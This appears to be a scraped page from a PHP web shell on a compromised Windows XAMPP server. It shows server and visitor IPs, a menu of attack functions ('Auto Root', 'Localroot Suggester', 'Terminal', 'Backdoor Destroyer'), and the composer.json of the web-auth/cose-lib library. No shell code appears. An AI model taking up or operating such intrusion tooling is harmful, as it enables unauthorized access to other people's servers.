Windows NT KAMIDAKI 10.0 build 19045 (Windows 10) AMD64
Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.3.9
Server IP : 192.168.3.16 & Your IP : 216.73.216.140
Domains :
Cant Read [ /etc/named.conf ]
User : SISTEMA
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
C: /
xampp /
phpMyAdmin /
vendor /
web-auth /
cose-lib /
Delete
Unzip
Name
Size
Permission
Date
Action
src
[ DIR ]
drwxrwxrwx
2024-07-26 17:41
LICENSE
1.04
KB
-rw-rw-rw-
2023-02-07 22:26
composer.json
788
B
-rw-rw-rw-
2023-02-07 22:26
Save
Rename
{ "name": "web-auth/cose-lib", "type": "library", "license": "MIT", "description": "CBOR Object Signing and Encryption (COSE) For PHP", "keywords": ["COSE", "RFC8152"], "homepage": "https://github.com/web-auth", "authors": [ { "name": "Florent Morselli", "homepage": "https://github.com/Spomky" }, { "name": "All contributors", "homepage": "https://github.com/web-auth/cose/contributors" } ], "require": { "php": ">=7.2", "ext-json": "*", "ext-openssl": "*", "ext-mbstring": "*", "fgrosse/phpasn1": "^2.1", "beberlei/assert": "^3.2" }, "autoload": { "psr-4": { "Cose\\": "src/" } } }